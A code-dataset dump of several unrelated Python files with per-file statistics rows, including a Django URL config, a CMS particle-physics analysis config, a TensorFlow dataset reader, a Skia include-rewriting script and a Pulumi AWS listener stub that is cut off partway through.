] | null | null | null | # -*- coding: utf-8 -*-
from django.conf.urls import url
from .user_admin_views import UserAdminListViewSet
user_admin_list = UserAdminListViewSet.as_view({
    "get": "get"
})
urlpatterns = (
url(r'^user$', user_admin_list, name='user-admin-list'),
)
| 15.823529 | 60 | 0.702602 | 35 | 269 | 5.2 | 0.6 | 0.197802 | 0.214286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004348 | 0.144981 | 269 | 16 | 61 | 16.8125 | 0.786957 | 0.078067 | 0 | 0 | 0 | 0 | 0.109756 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3ab32f767c6d6e9a4d044cf91516005f20c48e6 | 1,236 | py | Python | awsf_cwl_v1/split_num.py | pkerpedjiev/tibanna | 8d8333bc7757076914c2bafbd68ee24c4ad611f6 | [
"MIT"
] | null | null | null | awsf_cwl_v1/split_num.py | pkerpedjiev/tibanna | 8d8333bc7757076914c2bafbd68ee24c4ad611f6 | [
"MIT"
] | null | null | null | awsf_cwl_v1/split_num.py | pkerpedjiev/tibanna | 8d8333bc7757076914c2bafbd68ee24c4ad611f6 | [
"MIT"
] | null | null | null | #!/usr/bin/python
import sys
import csv
def split_num(n, M):
# n : original number
# M : max size for split range
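    # e.g. split_num(10, 4) returns ['1-3', '4-6', '7-9', '10-10']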
nsplit = n//M
if nsplit*M < n:
nsplit += 1
ninterval = n//nsplit
ncum = 1
end = 0
res = []
while end < n:
start = ncum
ncum += ninterval
end = ncum-1
if end > n:
end = n
res.append("{0}-{1}".format(start, end))
return res
def split_num_given_args():
n = int(sys.argv[1]) # original number
M = int(sys.argv[2]) # max size for split range
    print(split_num(n, M))
def split_chrom(chromsize_file, M):
with open(chromsize_file, 'r') as f:
reader = csv.reader(f, delimiter='\t')
for row in reader:
for interval in split_num(int(row[1]), int(M)):
print ("{chr}:{interval}".format(chr=row[0], interval=interval))
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Arguments")
parser.add_argument("-c", "--chrom", help="Chrom.size file, tab-delimited")
parser.add_argument("-M", "--max_split_size", help="Maximum split size")
args = parser.parse_args()
split_chrom(args.chrom, args.max_split_size)
| 24.72 | 80 | 0.590615 | 175 | 1,236 | 4.028571 | 0.377143 | 0.04539 | 0.031206 | 0.028369 | 0.056738 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011062 | 0.268608 | 1,236 | 49 | 81 | 25.22449 | 0.768805 | 0.085761 | 0 | 0 | 0 | 0 | 0.104889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.085714 | null | null | 0.057143 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3af3caa6c9db054915893aae3c8cc506266ac99 | 8,437 | py | Python | analysis/config/config_UltraLegacy18.py | cms-btv-pog/jet-tagging-sf | c418e13aa4eac5522818d5f5ad3db2a0c81ec52e | [
"Apache-2.0"
] | 3 | 2020-01-22T08:30:14.000Z | 2021-12-27T18:47:43.000Z | analysis/config/config_UltraLegacy18.py | cms-btv-pog/jet-tagging-sf | c418e13aa4eac5522818d5f5ad3db2a0c81ec52e | [
"Apache-2.0"
] | null | null | null | analysis/config/config_UltraLegacy18.py | cms-btv-pog/jet-tagging-sf | c418e13aa4eac5522818d5f5ad3db2a0c81ec52e | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
import scinum as sn
import numpy as np
def create_config(base_cfg):
# setup the config for 2018 data
from analysis.config.campaign_UltraLegacy18 import campaign as campaign_UltraLegacy18
from analysis.config.jet_tagging_sf import ch_ee, ch_emu, ch_mumu, ch_e, ch_mu
cfg = base_cfg.copy(campaign=campaign_UltraLegacy18)
# add datasets
dataset_names = [
"data_A_ee", "data_B_ee", "data_C_ee", "data_D_ee",
"data_A_emu", "data_B_emu", "data_C_emu", "data_D_emu",
"data_A_mumu", "data_B_mumu", "data_C_mumu", "data_D_mumu",
"data_A_e", "data_B_e", "data_C_e", "data_D_e",
"data_A_mu", "data_B_mu", "data_C_mu", "data_D_mu",
"tt_dl", "tt_sl",
"dy_lep_10To50",
#"dy_lep_50ToInf",
"dy_lep_LO_50ToInf",
#"dy_lep_0Jets", "dy_lep_1Jets", "dy_lep_2Jets",
"st_s_lep",
"st_t_t", "st_t_tbar",
"st_tW_t", "st_tW_tbar",
"WW", "WZ", "ZZ",
"W_lep",
#"ttH",
#"ttWJets_lep", "ttWJets_had", "ttZJets_lep", "ttZJets_had",
]
for dataset_name in dataset_names:
dataset = campaign_UltraLegacy18.get_dataset(dataset_name)
cfg.add_dataset(dataset)
# store channels per real dataset
cfg.set_aux("dataset_channels", {
dataset: cfg.get_channel(dataset.name.split("_")[-1])
for dataset in cfg.datasets.values()
if dataset.is_data
})
# store b-tagger working points
cfg.set_aux("working_points", {
"deepcsv": {
"loose": 0.1208,
"medium": 0.4168,
"tight": 0.7665,
},
"deepjet": {
"loose": 0.0490,
"medium": 0.2783,
"tight": 0.7100,
}
})
# luminosities per channel in /pb
cfg.set_aux("lumi", {
ch_ee: 59830.,
ch_emu: 59830.,
ch_mumu: 59830.,
ch_e: 59830.,
ch_mu: 59830.,
})
# run ranges
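    # (first run, last run) per 2018 data-taking era; used below for the era-dependent JES tags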
rr = cfg.set_aux("run_ranges", {
"A": (315252, 316995),
"B": (316998, 319312),
"C": (319313, 320393),
"D": (320394, 325273),
})
# global tags
cfg.set_aux("global_tag", {
"data": "106X_dataRun2_v28",
"mc": "106X_upgrade2018_realistic_v11_L1v1",
})
# lumi, normtag and pileup file
cfg.set_aux("lumi_file", "/afs/cern.ch/cms/CAF/CMSCOMM/COMM_DQM/certification/Collisions18/13TeV/"
"Legacy_2018/Cert_314472-325175_13TeV_Legacy2018_Collisions18_JSON.txt")
# https://twiki.cern.ch/twiki/bin/view/CMS/TWikiLUM
cfg.set_aux("normtag_file", "/cvmfs/cms-bril.cern.ch/cms-lumi-pog/Normtags/normtag_PHYSICS.json")
cfg.set_aux("pileup_file", "/afs/cern.ch/cms/CAF/CMSCOMM/COMM_DQM/certification/Collisions18/13TeV/"
"PileUp/pileup_latest.txt")
# triggers
# https://twiki.cern.ch/twiki/bin/view/CMS/TopTriggerYear2018
cfg.set_aux("triggers", {
ch_ee: [
"HLT_Ele23_Ele12_CaloIdL_TrackIdL_IsoVL_v*",
"HLT_Ele23_Ele12_CaloIdL_TrackIdL_IsoVL_DZ_v*",
],
ch_emu: [
"HLT_Mu23_TrkIsoVVL_Ele12_CaloIdL_TrackIdL_IsoVL_v*",
"HLT_Mu23_TrkIsoVVL_Ele12_CaloIdL_TrackIdL_IsoVL_DZ_v*",
"HLT_Mu12_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_DZ_v*",
"HLT_Mu8_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_DZ_v*",
],
ch_mumu: [
"HLT_Mu17_TrkIsoVVL_Mu8_TrkIsoVVL_DZ_Mass3p8_v*",
"HLT_Mu17_TrkIsoVVL_Mu8_TrkIsoVVL_DZ_Mass8_v*",
],
ch_e: [
"HLT_Ele35_WPTight_Gsf_v*",
"HLT_Ele28_eta2p1_WPTight_Gsf_HT150_v*",
],
ch_mu: [
"HLT_IsoMu24_v*",
],
})
# special triggers per real dataset
cfg.set_aux("data_triggers", {})
# MET filters
# https://twiki.cern.ch/twiki/bin/view/CMS/MissingETOptionalFiltersRun2
cfg.set_aux("metFilters", {
"data": [
"Flag_goodVertices", "Flag_globalSuperTightHalo2016Filter", "Flag_HBHENoiseFilter",
"Flag_HBHENoiseIsoFilter", "Flag_EcalDeadCellTriggerPrimitiveFilter",
"Flag_BadPFMuonFilter", #"Flag_BadChargedCandidateFilter",
"Flag_eeBadScFilter", #"Flag_ecalBadCalibReducedMINIAODFilter",
],
"mc": [
"Flag_goodVertices", "Flag_globalSuperTightHalo2016Filter", "Flag_HBHENoiseFilter",
"Flag_HBHENoiseIsoFilter", "Flag_EcalDeadCellTriggerPrimitiveFilter",
"Flag_BadPFMuonFilter", #"Flag_BadChargedCandidateFilter",
#"Flag_ecalBadCalibReducedMINIAODFilter",
],
})
# JER
cfg.set_aux("jer_version", "Summer19UL18_JRV2")
# JES
cfg.set_aux("jes_version", {
"data": [
rr["A"] + ("Summer19UL18_RunA_V5_DATA",),
rr["B"] + ("Summer19UL18_RunB_V5_DATA",),
rr["C"] + ("Summer19UL18_RunC_V5_DATA",),
rr["D"] + ("Summer19UL18_RunD_V5_DATA",),
],
"mc": [
(1, int(1e9), "Summer19UL18_V5_MC"),
],
})
# JES veto maps
cfg.set_aux("jes_veto_map", {
"file": "Summer19UL18_V1/hotjets-UL18.root",
"hist_name": "h2hot_ul18_plus_hem1516_plus_hbp2m1",
})
cfg.set_aux("jes_uncertainty_file", {
"factorized": None, # take file from jes github
"reduced": "",
})
# https://github.com/cms-sw/cmssw/blob/master/SimGeneral/MixingModule/python/mix_2018_25ns_UltraLegacy_PoissonOOTPU_cfi.py
cfg.set_aux("pileup_mc", [
8.89374611122e-07, 1.1777062868e-05, 3.99725585118e-05, 0.000129888015252, 0.000265224848687,
0.000313088635109, 0.000353781668514, 0.000508787237162, 0.000873670065767, 0.00147166880932,
0.00228230649018, 0.00330375581273, 0.00466047608406, 0.00624959203029, 0.00810375867901,
0.010306521821, 0.0129512453978, 0.0160303925502, 0.0192913204592, 0.0223108613632,
0.0249798930986, 0.0273973789867, 0.0294402350483, 0.031029854302, 0.0324583524255,
0.0338264469857, 0.0351267479019, 0.0360320204259, 0.0367489568401, 0.0374133183052,
0.0380352633799, 0.0386200967002, 0.039124376968, 0.0394201612616, 0.0394673457109,
0.0391705388069, 0.0384758587461, 0.0372984548399, 0.0356497876549, 0.0334655175178,
0.030823567063, 0.0278340752408, 0.0246009685048, 0.0212676009273, 0.0180250593982,
0.0149129830776, 0.0120582333486, 0.00953400069415, 0.00738546929512, 0.00563442079939,
0.00422052915668, 0.00312446316347, 0.00228717533955, 0.00164064894334, 0.00118425084792,
0.000847785826565, 0.000603466454784, 0.000419347268964, 0.000291768785963, 0.000199761337863,
0.000136624574661, 9.46855200945e-05, 6.80243180179e-05, 4.94806013765e-05, 3.53122628249e-05,
2.556765786e-05, 1.75845711623e-05, 1.23828210848e-05, 9.31669724108e-06, 6.0713272037e-06,
3.95387384933e-06, 2.02760874107e-06, 1.22535149516e-06, 9.79612472109e-07, 7.61730246474e-07,
4.2748847738e-07, 2.41170461205e-07, 1.38701083552e-07, 3.37678010922e-08, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0
])
# https://twiki.cern.ch/twiki/bin/viewauth/CMS/PileupJSONFileforData#Pileup_JSON_Files_For_Run_II
cfg.set_aux("min_bias_xs", sn.Number(69.2, (sn.Number.REL, 0.046))) # mb
# file merging information (stage -> dataset -> files after merging)
cfg.set_aux("file_merging", {
"trees": {
"data_D_e": 2,
"data_A_mu": 2,
"data_D_mu": 3,
"tt_dl": 456,
"tt_sl": 491,
"dy_lep_LO_50ToInf": 30,
"st_s_lep": 14,
"st_t_t": 14,
"st_t_tbar": 7,
"st_tW_t": 34,
"st_tW_tbar": 31,
"WW": 3,
"WZ": 2,
"W_lep": 3
}
})
# versions
cfg.set_aux("versions", {
"WriteTrees": "prod2", # including SL events
"MergeTrees": "prod2",
"MergeMetaData": "prod2",
"WriteHistograms": "prod2",
"MergeHistograms": "prod2",
"MeasureCScaleFactors": "prod1",
"MeasureScaleFactors": "prod1",
"FitScaleFactors": "prod1",
"BundleScaleFactors": "prod1",
"GetScaleFactorWeights": "prod1",
"MergeScaleFactorWeights": "prod1",
"OptimizeBinning": "prod1",
"CreateScaleFactorResults": "prod1",
})
return cfg
| 37.331858 | 126 | 0.620244 | 1,007 | 8,437 | 4.901688 | 0.364449 | 0.015802 | 0.023096 | 0.029984 | 0.20077 | 0.20077 | 0.157415 | 0.12581 | 0.106969 | 0.106969 | 0 | 0.23629 | 0.24357 | 8,437 | 225 | 127 | 37.497778 | 0.537136 | 0.1286 | 0 | 0.19209 | 0 | 0.016949 | 0.31748 | 0.165368 | 0 | 0 | 0 | 0 | 0 | 1 | 0.00565 | false | 0 | 0.022599 | 0 | 0.033898 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6c90866da3558fa85354b9fb39f92f13564b2e73 | 469 | py | Python | src/py_call.py | Lucien-MG/htools | c7cce486a101b182b03f0ac69e168b767a5c8d16 | [
"MIT"
] | null | null | null | src/py_call.py | Lucien-MG/htools | c7cce486a101b182b03f0ac69e168b767a5c8d16 | [
"MIT"
] | null | null | null | src/py_call.py | Lucien-MG/htools | c7cce486a101b182b03f0ac69e168b767a5c8d16 | [
"MIT"
] | null | null | null | #/bin/python3
import os
import subprocess
# Const:
with open("config",'r') as conf:
    VENV_A = conf.read().strip()  # strip the trailing newline from the stored path
PYTHON = "python"
PYTHON3_VENV_A = os.path.join(VENV_A, "bin", "python3")
PIP = ""
PIP_VENV_A = os.path.join(VENV_A, "bin", "pip3")
# Functions:
def python_call(argv):
subprocess.call([PYTHON, argv])
def python_vcall(argv):
subprocess.check_output([PYTHON3_VENV_A, argv])
def pip_vinstall(argv):
subprocess.check_output([PIP_VENV_A, argv])
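# e.g. python_vcall("script.py") runs script.py with the virtualenv's python3
# (assuming the "config" file holds the virtualenv path)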
| 17.37037 | 55 | 0.697228 | 71 | 469 | 4.380282 | 0.394366 | 0.11254 | 0.07717 | 0.07074 | 0.14791 | 0.14791 | 0.14791 | 0.14791 | 0 | 0 | 0 | 0.012469 | 0.144989 | 469 | 26 | 56 | 18.038462 | 0.763092 | 0.063966 | 0 | 0 | 0 | 0 | 0.068807 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.214286 | false | 0 | 0.142857 | 0 | 0.357143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6c9944dc5b1ae363873ef1748ed4ad89a74178d6 | 261 | py | Python | register_classes.py | Iherrbenza/SMB100A_Python | 80af83faa306a31f323869c2d20f121bb941d85b | [
"BSD-3-Clause"
] | null | null | null | register_classes.py | Iherrbenza/SMB100A_Python | 80af83faa306a31f323869c2d20f121bb941d85b | [
"BSD-3-Clause"
] | null | null | null | register_classes.py | Iherrbenza/SMB100A_Python | 80af83faa306a31f323869c2d20f121bb941d85b | [
"BSD-3-Clause"
] | null | null | null | # @Date: 2020-04-05T14:08:33+10:00
# @Last modified time: 2020-04-08T18:40:22+10:00
from labscript_devices import register_classes
register_classes(
'SMB100A',
BLACS_tab='labscript_devices.SMB100A.blacs_tabs.SMB100ATab',
runviewer_parser=None
)
| 23.727273 | 64 | 0.754789 | 38 | 261 | 5 | 0.736842 | 0.063158 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.197368 | 0.126437 | 261 | 10 | 65 | 26.1 | 0.635965 | 0.310345 | 0 | 0 | 0 | 0 | 0.305085 | 0.265537 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.166667 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6c9d70099a722ba2fbced930795b4aaa3c0d43d3 | 3,044 | py | Python | Super_TF/Dataset_IO/Classification/Dataset_reader_classification.py | Dhruv-Mohan/Super_TF | c693663adc59947cb7d15bd42ff260b7d3de6bdc | [
"MIT"
] | 8 | 2017-10-29T18:50:49.000Z | 2020-09-23T10:55:27.000Z | Super_TF/Dataset_IO/Classification/Dataset_reader_classification.py | Dhruv-Mohan/Tensorflow_Playground | c693663adc59947cb7d15bd42ff260b7d3de6bdc | [
"MIT"
] | null | null | null | Super_TF/Dataset_IO/Classification/Dataset_reader_classification.py | Dhruv-Mohan/Tensorflow_Playground | c693663adc59947cb7d15bd42ff260b7d3de6bdc | [
"MIT"
] | 1 | 2021-01-27T09:32:53.000Z | 2021-01-27T09:32:53.000Z | from utils.Dataset_reader import Dataset_reader
from Dataset_IO.Classification.Dataset_conifg_classification import Dataset_conifg_classification
import Dataset_IO.Classification.Dataset_classification_pb2 as proto
import tensorflow as tf
import os
#TODO: ADD TFRECORDS AND MEANPROTO READING CHECKS
class Dataset_reader_classification(Dataset_reader,Dataset_conifg_classification):
"""Implementation of Dataset reader for classification"""
def __init__(self, filename=None, epochs=100, num_classes=18):
super().__init__()
with tf.name_scope('Dataset_Classification_Reader') as scope:
self.batch_size = tf.placeholder(tf.int32, name='Dataset_batch_size')
self.num_classes = num_classes
self.open_dataset(filename=filename, epochs=epochs)
self.mean_header_proto = proto.Image_set()
dataset_path, dataset_name = os.path.split(filename)
common_name, _ = os.path.splitext(dataset_name)
mean_file_path = os.path.join(dataset_path,common_name +'_mean.proto')
with open(mean_file_path,"rb") as mean_header_file:
self.mean_header_proto.ParseFromString(mean_header_file.read())
self.image_shape = [self.mean_header_proto.Image_headers.image_height, self.mean_header_proto.Image_headers.image_width, self.mean_header_proto.Image_headers.image_depth]
mean_image_data = self.mean_header_proto.mean_data
self.mean_image = tf.image.convert_image_dtype(tf.image.decode_image(mean_image_data), tf.float32)
self.mean_image.set_shape(self.image_shape)
self.images , self.one_hot_labels = self.batch_inputs()
def single_read(self):
features = tf.parse_single_example(self.serialized_example, features=self._Feature_dict)
image = tf.image.decode_image(features[self._Image_handle])
image.set_shape(self.image_shape)
image = tf.image.convert_image_dtype(image, tf.float32)
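        # normalize by subtracting the dataset mean image loaded from the *_mean.proto sidecar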
image = image - self.mean_image
return image , features[self._Label_handle]
def pre_process_image(self,pre_process_op):
with tf.name_scope('Pre_Processing_op') as scope:
self.images = pre_process_op(self.images)
def batch_inputs(self):
image , label = self.single_read()
images , sparse_labels = tf.train.shuffle_batch([image , label], batch_size=self.batch_size, num_threads=8, capacity=5000+128, min_after_dequeue=5000)
one_hot_labels = tf.one_hot(sparse_labels,self.num_classes)
return images, one_hot_labels
#TODO: CONFIGURABLE PARAMS
def next_batch(self, batch_size=1, sess=None):
with tf.name_scope('Batch_getter') as scope:
if sess is None :
self.sess = tf.get_default_session()
else:
self.sess = sess
images , labels = self.sess.run([self.images , self.one_hot_labels], feed_dict={self.batch_size : batch_size})
return images , labels
| 42.873239 | 182 | 0.704993 | 401 | 3,044 | 5.012469 | 0.276808 | 0.035821 | 0.041791 | 0.056716 | 0.171642 | 0.135323 | 0.053731 | 0 | 0 | 0 | 0 | 0.010369 | 0.20795 | 3,044 | 70 | 183 | 43.485714 | 0.82331 | 0.041064 | 0 | 0 | 0 | 0 | 0.030574 | 0.009962 | 0 | 0 | 0 | 0.014286 | 0 | 1 | 0.108696 | false | 0 | 0.108696 | 0 | 0.304348 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6ca00e46178f8bac44744669d606c5898da9f6e3 | 2,254 | py | Python | tools/rewrite_includes.py | Shachlan/skia | 633db4db7672fd55b48ba1073256853e00f18d8c | [
"BSD-3-Clause"
] | 6 | 2018-10-20T10:53:55.000Z | 2021-12-25T07:58:57.000Z | tools/rewrite_includes.py | Shachlan/skia | 633db4db7672fd55b48ba1073256853e00f18d8c | [
"BSD-3-Clause"
] | null | null | null | tools/rewrite_includes.py | Shachlan/skia | 633db4db7672fd55b48ba1073256853e00f18d8c | [
"BSD-3-Clause"
] | 9 | 2018-10-31T03:07:11.000Z | 2021-08-06T08:53:21.000Z | #!/usr/bin/python2
#
# Copyright 2019 Google Inc.
#
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
roots = [
'bench',
'dm',
'docs',
'example',
'experimental',
'fuzz',
'gm',
'include',
'modules',
'platform_tools/android/apps',
'samplecode',
'src',
'tests',
'third_party/etc1',
'third_party/gif',
'tools'
]
# Map short name -> absolute path for all Skia headers.
headers = {}
for root in roots:
for path, _, files in os.walk(root):
for file_name in files:
if file_name.endswith('.h'):
if file_name in headers:
print path, file_name, headers[file_name]
assert file_name not in headers
headers[file_name] = os.path.abspath(os.path.join(path, file_name))
# Rewrite any #includes relative to Skia's top-level directory.
for root in roots:
for path, _, files in os.walk(root):
if 'generated' in path:
continue
for file_name in files:
if (file_name.endswith('.h') or
file_name.endswith('.c') or
file_name.endswith('.m') or
file_name.endswith('.mm') or
file_name.endswith('.inc') or
file_name.endswith('.fp') or
file_name.endswith('.cc') or
file_name.endswith('.cpp')):
# Read the whole file into memory.
file_path = os.path.join(path, file_name)
lines = open(file_path).readlines()
# Write it back out again line by line with substitutions for #includes.
with open(file_path, 'w') as output:
includes = []
for line in lines:
parts = line.split('"')
if (len(parts) == 3
and '#' in parts[0]
and 'include' in parts[0]
and os.path.basename(parts[1]) in headers):
header = headers[os.path.basename(parts[1])]
includes.append(parts[0] +
'"%s"' % os.path.relpath(header, '.') +
parts[2])
else:
for inc in sorted(includes):
print >>output, inc.strip('\n')
includes = []
print >>output, line.strip('\n')
| 28.531646 | 80 | 0.550577 | 287 | 2,254 | 4.233449 | 0.421603 | 0.118519 | 0.118519 | 0.103704 | 0.192593 | 0.159671 | 0.123457 | 0.123457 | 0.123457 | 0.123457 | 0 | 0.008513 | 0.322538 | 2,254 | 78 | 81 | 28.897436 | 0.787164 | 0.159716 | 0 | 0.133333 | 0 | 0 | 0.09782 | 0.014354 | 0 | 0 | 0 | 0 | 0.016667 | 0 | null | null | 0 | 0.016667 | null | null | 0.05 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6ca2384cbcb96f1ed16b80307991583b5132ac71 | 598 | py | Python | unit_tests/test_class_query.py | usc-isi-i2/gaia-question-sparql | fb40ea6259686997ad9d805729fcca80516ddf92 | [
"MIT"
] | null | null | null | unit_tests/test_class_query.py | usc-isi-i2/gaia-question-sparql | fb40ea6259686997ad9d805729fcca80516ddf92 | [
"MIT"
] | null | null | null | unit_tests/test_class_query.py | usc-isi-i2/gaia-question-sparql | fb40ea6259686997ad9d805729fcca80516ddf92 | [
"MIT"
] | null | null | null | import unittest
import sys
import os
sys.path.append('../')
from src.class_query import ClassQuery
from src.query_tool import QueryTool, Mode
base_path = os.path.dirname(__file__)
cq = ClassQuery(base_path + '/sample_queries/class_queries.xml')
class TestClassQuery(unittest.TestCase):
def test_class_cluster(self):
qt = QueryTool(base_path + '/sample_ttls/doc1.ttl', Mode.CLUSTER)
responses, stat, errors = cq.ask_all(qt)
res = [len(x.find('justifications')) for x in responses.getchildren()]
self.assertFalse(errors)
self.assertEqual(res, [2, 1])
| 28.47619 | 78 | 0.712375 | 81 | 598 | 5.074074 | 0.592593 | 0.058394 | 0.068127 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006012 | 0.165552 | 598 | 20 | 79 | 29.9 | 0.817635 | 0 | 0 | 0 | 0 | 0 | 0.119128 | 0.090604 | 0 | 0 | 0 | 0 | 0.133333 | 1 | 0.066667 | false | 0 | 0.333333 | 0 | 0.466667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
6ca7fb675928141bb07d0f78ee1eb39e58fe4eda | 296 | py | Python | NetCatKS/DProtocol/api/interfaces/storage/__init__.py | dimddev/NetCatKS-CP | 2d9e72b2422e344569fd4eb154866b98e9707561 | [
"BSD-2-Clause"
] | null | null | null | NetCatKS/DProtocol/api/interfaces/storage/__init__.py | dimddev/NetCatKS-CP | 2d9e72b2422e344569fd4eb154866b98e9707561 | [
"BSD-2-Clause"
] | null | null | null | NetCatKS/DProtocol/api/interfaces/storage/__init__.py | dimddev/NetCatKS-CP | 2d9e72b2422e344569fd4eb154866b98e9707561 | [
"BSD-2-Clause"
] | null | null | null | __author__ = 'dimd'
from zope.interface import Interface, Attribute
class IProtocolStogareInterface(Interface):
"""
This interface define our session storage
Every custom storage have to implement this Interface
"""
session = Attribute(""" Container for our session """) | 21.142857 | 58 | 0.722973 | 31 | 296 | 6.774194 | 0.677419 | 0.12381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.199324 | 296 | 14 | 58 | 21.142857 | 0.886076 | 0.320946 | 0 | 0 | 0 | 0 | 0.17033 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
6caacd92f800cd39592b48cdfb06a9aeead365f0 | 10,543 | py | Python | sdk/python/pulumi_aws_native/elasticloadbalancingv2/listener.py | AaronFriel/pulumi-aws-native | 5621690373ac44accdbd20b11bae3be1baf022d1 | [
"Apache-2.0"
] | 29 | 2021-09-30T19:32:07.000Z | 2022-03-22T21:06:08.000Z | sdk/python/pulumi_aws_native/elasticloadbalancingv2/listener.py | AaronFriel/pulumi-aws-native | 5621690373ac44accdbd20b11bae3be1baf022d1 | [
"Apache-2.0"
] | 232 | 2021-09-30T19:26:26.000Z | 2022-03-31T23:22:06.000Z | sdk/python/pulumi_aws_native/elasticloadbalancingv2/listener.py | AaronFriel/pulumi-aws-native | 5621690373ac44accdbd20b11bae3be1baf022d1 | [
"Apache-2.0"
] | 4 | 2021-11-10T19:42:01.000Z | 2022-02-05T10:15:49.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ListenerArgs', 'Listener']
@pulumi.input_type
class ListenerArgs:
def __init__(__self__, *,
default_actions: pulumi.Input[Sequence[pulumi.Input['ListenerActionArgs']]],
load_balancer_arn: pulumi.Input[str],
alpn_policy: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
certificates: Optional[pulumi.Input[Sequence[pulumi.Input['ListenerCertificateArgs']]]] = None,
port: Optional[pulumi.Input[int]] = None,
protocol: Optional[pulumi.Input[str]] = None,
ssl_policy: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a Listener resource.
"""
pulumi.set(__self__, "default_actions", default_actions)
pulumi.set(__self__, "load_balancer_arn", load_balancer_arn)
if alpn_policy is not None:
pulumi.set(__self__, "alpn_policy", alpn_policy)
if certificates is not None:
pulumi.set(__self__, "certificates", certificates)
if port is not None:
pulumi.set(__self__, "port", port)
if protocol is not None:
pulumi.set(__self__, "protocol", protocol)
if ssl_policy is not None:
pulumi.set(__self__, "ssl_policy", ssl_policy)
@property
@pulumi.getter(name="defaultActions")
def default_actions(self) -> pulumi.Input[Sequence[pulumi.Input['ListenerActionArgs']]]:
return pulumi.get(self, "default_actions")
@default_actions.setter
def default_actions(self, value: pulumi.Input[Sequence[pulumi.Input['ListenerActionArgs']]]):
pulumi.set(self, "default_actions", value)
@property
@pulumi.getter(name="loadBalancerArn")
def load_balancer_arn(self) -> pulumi.Input[str]:
return pulumi.get(self, "load_balancer_arn")
@load_balancer_arn.setter
def load_balancer_arn(self, value: pulumi.Input[str]):
pulumi.set(self, "load_balancer_arn", value)
@property
@pulumi.getter(name="alpnPolicy")
def alpn_policy(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "alpn_policy")
@alpn_policy.setter
